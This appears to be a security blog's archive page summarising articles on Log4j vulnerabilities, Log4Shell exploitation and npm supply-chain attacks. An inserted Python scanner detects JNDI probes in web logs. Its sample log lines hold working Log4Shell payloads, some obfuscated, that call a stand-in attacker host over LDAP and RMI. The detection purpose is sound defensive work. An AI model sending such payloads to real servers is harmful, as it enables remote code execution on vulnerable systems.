New Log4j 1.x CVEs, and critical Chainsaw Vulnerability — What to Do?

By Ax Sharma on January 21, 2022 vulnerabilities

5 minute read time

Apache disclosed three vulnerabilities affecting Log4j 1.x, with details of a critical Apache Chainsaw vulnerability buried within the disclosure.

npm Libraries ‘colors’ and ‘faker’ Sabotaged in Protest by their Maintainer—What to do Now?

By Ax Sharma on January 10, 2022 vulnerabilities

7 minute read time

The popular npm open source libraries colors.js and faker.js were sabotaged by their own maintainer. What does that mean for open source sustainability?

Researcher Takes Over qr.js via Repo Hijacking. Is the npm Package Safe?

By Ax Sharma on December 31, 2021 vulnerabilities

5 minute read time

Analyzing a live incident of repo jacking that affects the GitHub repository of the popular ‘qr.js’ library.

Log4j 2.17.1 fixes another code execution bug, but should you worry?

By Ax Sharma on December 29, 2021 vulnerabilities

7 minute read time

News of another possible open source vulnerability connected to Log4j raised eyebrows. A look at the issue, its disclosure, and our response.

Log4j Exploits Are Now Being Used to Spread Dridex Banking Trojan

By Ax Sharma on December 21, 2021 vulnerabilities

5 minute read time

Log4Shell exploits are now being leveraged by threat actors to infect Windows machines with the Dridex Trojan and Linux devices with Meterpreter.

Log4Shell by the numbers: Why did CVE-2021-44228 set the Internet on fire?

By Ilkka Turunen on December 14, 2021 vulnerabilities

6 minute read time

What the download numbers tell us about the impact of the critical vulnerability CVE-2021-44228.

Critical New 0-day Vulnerability in Popular Log4j Library Discovered with Evidence of Mass Scanning for Affected Applications - Latest updates

By Ilkka Turunen on December 10, 2021 vulnerabilities

7 minute read time

A serious 0-day remote code execution exploit in Log4j, the most popular Java logging framework, was discovered today. Immediate action is needed from software maintainers.
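The mass scanning mentioned above shows up in web server logs as JNDI lookup strings in request paths and headers, frequently obfuscated with nested Log4j lookups so that a naive `grep jndi` misses them. The following is an added example, not code from the original post or from Sonatype: it normalizes the common `${lower:...}`, `${upper:...}` and `${...:-default}` nesting tricks (the resolution rules are assumed from documented Log4j lookup behaviour) and then flags lines carrying `${jndi:<scheme>:`. The log lines are constructed for the example.

```python
import re

# Constructed sample access-log lines (not real traffic). The first three
# carry Log4Shell-style JNDI lookups, the last two are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.7 - - [10/Dec/2021:14:02:13 +0000] '
    '"GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c} HTTP/1.1" 404 0',
    '10.0.0.8 - - [10/Dec/2021:14:02:14 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 88',
]

# Innermost ${...} lookup: no nested braces or '$' inside.
_INNER = re.compile(r'\$\{([^${}]*)\}')


def _resolve(expr):
    """Resolve one innermost lookup the way vulnerable Log4j 2.x versions do
    (assumed from documented lookup behaviour): 'lower:'/'upper:' case-fold
    their argument and 'name:-default' yields the default, so '${::-j}' -> 'j'.
    Any other lookup is kept verbatim so the scanner never invents content."""
    if ':-' in expr:
        return expr.split(':-', 1)[1]
    name, sep, arg = expr.partition(':')
    if sep:
        if name.lower() == 'lower':
            return arg.lower()
        if name.lower() == 'upper':
            return arg.upper()
    return '${' + expr + '}'


def normalize(text, max_rounds=20):
    """Collapse nested lookups to a fixed point (bounded) so that the
    obfuscated forms above reduce to a plain '${jndi:...}' string."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:', re.IGNORECASE)


def find_jndi(line):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a
    Log4Shell-style lookup after de-obfuscation, otherwise None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line_index, scheme) for every line that looks like a probe."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme is not None:
            hits.append((i, scheme))
    return hits


if __name__ == '__main__':
    for idx, scheme in scan(SAMPLE_LOG_LINES):
        print(f'line {idx}: JNDI probe via {scheme}')
```

A miss is not proof of absence: only the lookup forms above are normalized, and scanners also URL-encode payloads or route them through `${env:...}` and similar lookups, so pair this with patching rather than relying on it alone.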

Tracking the ‘Noblox.js’ npm Malware Campaign

By Juan Aguirre on November 23, 2021 vulnerabilities

4 minute read time

Another malicious npm package, noblox.js-rpc, was spotted on the registry; it leverages familiar techniques to steal all sorts of sensitive data.

NPM Hijackers at it Again: Popular ‘coa’ and ‘rc’ Open Source Libraries Taken Over to Spread Malware

By Juan Aguirre on November 05, 2021 vulnerabilities

6 minute read time

The npm packages coa and rc were hijacked via an account takeover, again highlighting the need to protect your open source software supply chain.